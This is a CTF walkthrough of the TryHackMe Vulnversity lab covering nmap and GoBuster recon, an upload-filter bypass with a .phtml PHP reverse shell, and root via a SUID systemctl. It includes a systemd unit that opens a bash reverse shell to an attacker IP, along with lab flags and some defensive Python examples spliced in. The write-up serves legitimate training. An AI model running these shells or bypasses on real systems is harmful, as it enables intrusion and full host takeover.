Walkthrough : Vulnversity

shiv shankar yadav
6 min read · Apr 14, 2023

Vulnversity is an easy-difficulty vulnerable lab on TryHackMe that gives good hands-on knowledge of active reconnaissance of a web application using nmap and service enumeration, a web application attack (a file upload vulnerability), and privilege escalation.

Task 2 : Reconnaissance

What is Reconnaissance ?

Reconnaissance, also known as recon, is the initial phase of the information-gathering process in cybersecurity. It involves collecting information about a target system or network in order to identify potential vulnerabilities and attack vectors. The goal of reconnaissance is to gather as much information as possible about the target, without alerting the target to the fact that an attack is being planned or conducted.

Reconnaissance can be done through a variety of methods, including:

  1. Passive Reconnaissance: This involves collecting information about the target system or network through public sources of information, such as social media, websites, and search engines.
  2. Active Reconnaissance: This involves actively probing the target system or network to collect information through methods such as port scanning, vulnerability scanning, and network mapping.
  3. Human Reconnaissance: This involves gathering information through social engineering techniques, such as phishing, pretexting, and impersonation.

Reconnaissance is a critical step in the cybersecurity process because it allows attackers to understand the target system or network and identify potential vulnerabilities or weaknesses that can be exploited. Conversely, reconnaissance can also be used by defenders to identify potential attack vectors and shore up defenses before an attack occurs.

Gather information about this machine using a network scanning tool called nmap.

What is NMAP?

nmap is a free, open-source and powerful tool used to discover hosts and services on a computer network. In our example, we are using nmap to scan this machine to identify all services that are running on a particular port. nmap has many capabilities; below is a table summarising some of the functionality it provides.

Scan this box: nmap -sV <machine's ip>

There are many nmap “cheatsheets” online that you can use too.

nmap flag Description
-sV Attempts to determine the version of the services running
-p <x> or -p- Port scan for port <x> or scan all ports
-Pn Disable host discovery and just scan for open ports
-A Enables OS and version detection, executes in-built scripts for further enumeration
-sC Scan with the default nmap scripts
-v Verbose mode
-sU UDP port scan
-sS TCP SYN port scan

Ques : Scan the box, how many ports are open?

Answer : 6

Ques : What version of the squid proxy is running on the machine?

Answer : 3.5.12

Ques : How many ports will nmap scan if the flag -p-400 was used?

Answer : 400

Ques : Using the nmap flag -n what will it not resolve?

Answer : DNS

Ques : What is the most likely operating system this machine is running?

Answer : Ubuntu

Ques : What port is the web server running on?

Answer : 3333
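To make the -p-400 question concrete, here is a small parser for nmap's -p port specification. This is an added example, not code from the original post or from nmap itself; it implements the TCP subset of the syntax (single ports, ranges, open-ended ranges, "-" for everything, comma-separated lists) and ignores the U:/T: protocol prefixes and port 0.

```python
# Added example (not part of the original walkthrough): a parser for nmap's
# -p port specification, to reason about questions like "-p-400". It covers
# the TCP subset: "N", "A-B", open-ended "-B" / "A-", "-" (all ports) and
# comma-separated lists; the U:/T: protocol prefixes and port 0 are not handled.
from typing import Set

MAX_PORT = 65535

def parse_port_spec(spec: str) -> Set[int]:
    """Expand an nmap -p value into the set of ports it covers."""
    ports: Set[int] = set()
    for item in spec.split(","):
        item = item.strip()
        if not item:
            raise ValueError("empty port entry")
        if "-" in item:
            low_s, high_s = item.split("-", 1)
            low = int(low_s) if low_s else 1            # "-400" means 1-400
            high = int(high_s) if high_s else MAX_PORT  # "1000-" means 1000-65535
        else:
            low = high = int(item)
        if not 1 <= low <= high <= MAX_PORT:
            raise ValueError(f"invalid port range: {item!r}")
        ports.update(range(low, high + 1))
    return ports

def port_count(spec: str) -> int:
    """How many ports nmap would scan for the given -p value."""
    return len(parse_port_spec(spec))

if __name__ == "__main__":
    for spec in ("-400", "-", "22,80,443", "1-1024", "3333"):
        print(f"-p{spec:<12} -> {port_count(spec)} ports")
```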

Task 3 : Locating directories using GoBuster

Using a fast directory discovery tool called GoBuster you will locate a directory that you can use to upload a shell to.

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

Download GoBuster here, or if you’re on Kali Linux 2020.1+ run sudo apt-get install gobuster

To get started, you will need a wordlist for GoBuster (GoBuster will quickly go through the wordlist to identify whether a public directory is available). If you are using Kali Linux you can find many wordlists under /usr/share/wordlists.

Now let's run GoBuster with a wordlist: gobuster dir -u http://10.10.27.213:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

GoBuster flag        Description
-e                   Print the full URLs in your console
-u                   The target URL
-w                   Path to your wordlist
-U and -P            Username and Password for Basic Auth
-p <x>               Proxy to use for requests
-c <http cookies>    Specify a cookie for simulating your auth

Ques : What is the directory that has an upload form page?

/internal/
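From the defender's side, a GoBuster run like the one above leaves a very recognisable trace in the web server's access log: one client producing a burst of 404s for wordlist-style paths. The following is an added example, not part of the original post; it parses common-format log lines and flags clients whose 404 rate inside a sliding window crosses a threshold. The log lines, client IPs and paths are constructed for the demo.

```python
# Added example (not from the original post): flagging GoBuster-style directory
# brute-forcing in a web server access log by counting 404s per client inside a
# sliding time window. The log lines, client IPs and paths are constructed.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one Apache/nginx common-format line; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec

def detect_dir_bruteforce(lines, threshold=8, window_seconds=10):
    """Return {ip: peak 404s in one window} for clients that produced at least
    `threshold` 404 responses within `window_seconds` of each other."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent 404s
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 404:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while rec["ts"] - q[0] > timedelta(seconds=window_seconds):
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged

# Constructed sample: one client walking a wordlist, one normal visitor.
GUESSES = ["admin", "backup", "cgi-bin", "config", "css", "data",
           "db", "dev", "images", "img", "js", "old"]
SAMPLE_LOG = [
    f'10.10.14.5 - - [14/Apr/2023:10:00:{i:02d} +0000] "GET /{p} HTTP/1.1" 404 275'
    for i, p in enumerate(GUESSES)
] + [
    '10.10.14.20 - - [14/Apr/2023:10:00:03 +0000] "GET /internal/ HTTP/1.1" 200 1234',
    '10.10.14.20 - - [14/Apr/2023:10:00:04 +0000] "GET /favicon.ico HTTP/1.1" 404 275',
]
```

Calling detect_dir_bruteforce(SAMPLE_LOG) reports only the scanning client; the visitor with a single 404 stays below the threshold.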

Task 4 : Compromise the webserver

Now we have found a form to upload files, we can leverage this to upload and execute our payload that will lead to compromising the web server.

Ques : What common file type, which you’d want to upload to exploit the server, is blocked? Try a couple to find out.

.php

To identify which extensions are not blocked, we’re going to fuzz the upload form.

We’re going to use Intruder (used for automating customised attacks).

To begin, make a wordlist with the following extensions in:

Now make sure BurpSuite is configured to intercept all your browser traffic. Upload a file, once this request is captured, send it to the Intruder. Click on “Payloads” and select the “Sniper” attack type.

Run this attack, what extension is allowed?

.phtml

Now we know what extension we can use for our payload we can progress.
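The reason .phtml gets through is the classic extension-blacklist mistake: the form rejects the one extension it knows about and accepts everything else, including extensions the web server still hands to the PHP interpreter. Below is an added example (not code from the original post or from the lab) that puts that blacklist check beside an allowlist check; the filenames and the allowed set are constructed for the demo.

```python
# Added example (not code from the original post or the lab): the extension
# blacklist pattern that blocks ".php" yet lets ".phtml" through, beside an
# allowlist check. Filenames and the allowed set are constructed for the demo.
import os
import re

BLOCKED_EXTENSIONS = {".php"}            # what the lab's form effectively rejects
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def blacklist_check(filename: str) -> bool:
    """Vulnerable: rejects only the extensions it knows about, so any other
    extension the web server maps to the PHP handler (e.g. .phtml) is accepted."""
    _, ext = os.path.splitext(filename)
    return ext.lower() not in BLOCKED_EXTENSIONS

def allowlist_check(filename: str) -> bool:
    """Hardened: accept only a plain basename with exactly one dot and an
    extension from the allowlist; everything unknown is rejected by default."""
    if os.path.basename(filename) != filename or filename.count(".") != 1:
        return False                      # path components or double extensions
    stem, ext = filename.split(".")
    return bool(SAFE_STEM.match(stem)) and ext.lower() in ALLOWED_EXTENSIONS

def compare(filename: str):
    """(blacklist verdict, allowlist verdict) for one upload name."""
    return blacklist_check(filename), allowlist_check(filename)

if __name__ == "__main__":
    for name in ("php-reverse-shell.php", "php-reverse-shell.phtml",
                 "photo.JPG", "../photo.jpg", "shell.phtml.jpg"):
        print(f"{name:28} blacklist={compare(name)[0]!s:5} allowlist={compare(name)[1]}")
```

An extension check alone is still not enough: the uploads directory should be served without script execution, and the server should pick the stored filename rather than trusting the client's.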

We are going to use a PHP reverse shell as our payload. A reverse shell works by being executed on the remote host and forcing that host to make a connection back to you. So you'll listen for incoming connections, upload the shell and have it executed, and it will beacon out to you so you can control the host.

Download the following reverse PHP shell here.

To gain remote access to this machine, follow these steps:

  1. Edit the php-reverse-shell.php file and edit the ip to be your tun0 ip (you can get this by going to http://10.10.10.10 in the browser of your TryHackMe connected device).
  2. Rename this file to php-reverse-shell.phtml
  3. We’re now going to listen to incoming connections using netcat. Run the following command: nc -lvnp 4444
  4. Upload your shell and navigate to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml — This will execute your payload
  5. You should see a connection on your netcat session

What is the name of the user who manages the webserver?

bill

What is the user flag?

8bd7992fbe8a6ad22a63361004cfcedb

Task 5 : Privilege Escalation

Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).

In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

For example, the binary used to change your password has the SUID bit set on it (/usr/bin/passwd). This is because changing your password requires writing to the shadow file, which you do not have access to but root does, so the program runs with root privileges to make the necessary changes.

On the system, search for all SUID files. What file stands out?

/bin/systemctl
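What makes /bin/systemctl "stand out" is that it is not in the set of binaries a stock install is expected to have SUID. The added example below (not part of the original walkthrough) does that comparison: it walks a tree the way find / -perm -4000 -type f does and reports SUID files missing from a baseline. The baseline and the demo tree are constructed for the example, not a real distribution's list.

```python
# Added example (not part of the original walkthrough): audit a filesystem
# tree for SUID binaries the way `find / -perm -4000 -type f` does, and report
# those absent from an expected baseline, which is how /bin/systemctl stands
# out. The baseline and the demo tree are constructed, not a distro's real list.
import os
import stat
import tempfile

EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount"}

def find_suid(root):
    """Return sorted paths of regular files under `root` with the SUID bit set."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)        # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)

def unexpected_suid(root, baseline=EXPECTED_SUID):
    """SUID files whose path relative to `root` is not in the baseline."""
    return [p for p in find_suid(root)
            if "/" + os.path.relpath(p, root) not in baseline]

def build_demo_tree():
    """Constructed fixture: a fake root with one expected SUID file, one rogue
    SUID file (bin/systemctl) and one ordinary binary."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    layout = {"usr/bin/passwd": 0o4755, "bin/systemctl": 0o4755, "bin/ls": 0o755}
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(b"#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    return root

if __name__ == "__main__":
    demo = build_demo_tree()
    for p in unexpected_suid(demo):
        print("unexpected SUID:", p)
```

Running the audit against a real host means calling unexpected_suid("/") with a baseline taken from a known-good image of the same distribution.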

On Attacker Machine :

Save the following file as root.service and serve it to the victim machine with Python's built-in web server.

[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.13.23.241/9999 0>&1'
[Install]
WantedBy=multi-user.target

python3 -m http.server 80

On Victim Machine :

wget http://10.13.23.241/root.service

systemctl start root.service

On the attacker machine, run a netcat listener to receive the connection:

nc -nlvp 9999

It's challenge time! We have guided you through this far; are you able to exploit this system further to escalate your privileges and get the final answer?

Become root and get the last flag (/root/root.txt)

a58ff8579f0a9270368d33a9966c7fd5
